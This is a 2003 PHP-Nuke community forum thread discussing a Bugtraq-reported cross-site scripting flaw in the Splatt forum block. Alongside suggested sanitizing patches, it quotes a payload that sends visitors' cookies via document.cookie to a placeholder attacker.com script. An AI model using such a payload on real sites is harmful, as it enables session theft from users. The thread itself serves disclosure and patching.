You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 54 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - PHP-Nuke (Splatt) block-Forums.php subject vulnerabilities [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

PHP-Nuke (Splatt) block-Forums.php subject vulnerabilities
 
Post new topic  Reply to topicprinter-friendly view Nuke Cops Forum Index » Nuke Security
View previous topic Log in to check your private messages View next topic
Author Message
sixonetonoffun
Major
Major


Joined: Jan 13, 2003
Posts: 892
PostPosted: Mon Mar 31, 2003 7:37 pm Reply with quoteBack to top
3/31/2003 Posted to Bugtraq mailing list by lethalman@libero_DOT_it

PHP-Nuke block-Forums.php subject vulnerabilities


The block-Forums.php file have a vuln if an attacker

insert a malformatted subject to a topic of Splatt

Forum. A type of subject is:

">&script&alert('bug'");&/script&


The 'alt' tag is closed by "> and the other text is

normal html. This bug is very bad if a subject is:


">&script&window.open('www.attacker.com/prova.php?cookie='+document.cookie);&/script&


And prova.php register cokkies in a file.

The solution:

Add under "$title2 = stripslashes($title2);" line, this

line:

"$title2 = addslashes($title2);"

And now, backward any " there is a backslash!

_________________
www.netflake.com
www.glowoptics.com
Find all posts by sixonetonoffunView user's profileSend private message
sixonetonoffun
Major
Major


Joined: Jan 13, 2003
Posts: 892
PostPosted: Mon Mar 31, 2003 7:47 pm Reply with quoteBack to top
I should make Note* the poster did not say if Splatt had been alerted. Nor which version was tested. So I have to assume this was another fast and loose post to Bugtraq.

_________________
www.netflake.com
www.glowoptics.com
Find all posts by sixonetonoffunView user's profileSend private message
anthonyaykut
Lieutenant
Lieutenant


Joined: Mar 26, 2003
Posts: 182

Location: Europe
PostPosted: Mon Mar 31, 2003 8:27 pm Reply with quoteBack to top
I think this is true, and not only in the Splatt block coz some dude tried this out all over my Splatt forums 4.0RC1 last week - see our thread "Interesting Hack/Exploit Attempt" in this section (http://www.nukecops.com/postt1349.html).

I tried to contact Splatt about this, but (unsurprisingly) to no avail... one thing I dont understand six, is,

1. what is meant by..
And now, backward any " there is a backslash!
2. And how is it done??

Think I am going to go through all my splatt files and do a trial-and-error
and add this stuff coz there is a huge gaping hole somewhere!

Regards
Anthony
Find all posts by anthonyaykutView user's profileSend private messageSend e-mailVisit poster's website
sixonetonoffun
Major
Major


Joined: Jan 13, 2003
Posts: 892
PostPosted: Mon Mar 31, 2003 8:38 pm Reply with quoteBack to top
He means behind any quote will be a backwards slash.

_________________
www.netflake.com
www.glowoptics.com
Find all posts by sixonetonoffunView user's profileSend private message
sixonetonoffun
Major
Major


Joined: Jan 13, 2003
Posts: 892
PostPosted: Mon Mar 31, 2003 9:12 pm Reply with quoteBack to top
Any long form fields should be patched in such a way as described. Anywhere html isn't needed you could using the $title example use

$title = htmlspecialchars(stripslashes(addslashes($title)));

Here is another again usable where no html would be allowed.
$title = htmlspecialchars(stripslashes(FixQuotes($title)));

I just put it in one line it works in seperate lines as given in the above post fine too.

Its sort of a trial and error thing. Like when FB used htmlspecialchars on signitures in the user profiles everyone had chit fits because they could't post images anymore even in bbcode. So he changed back to a less restrictive filter.

Which is still semi vulnerable to the exact exploit used above. But thats what the users want.

_________________
www.netflake.com
www.glowoptics.com
Find all posts by sixonetonoffunView user's profileSend private message
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view Nuke Cops Forum Index » Nuke Security
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.397 Seconds - 298 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::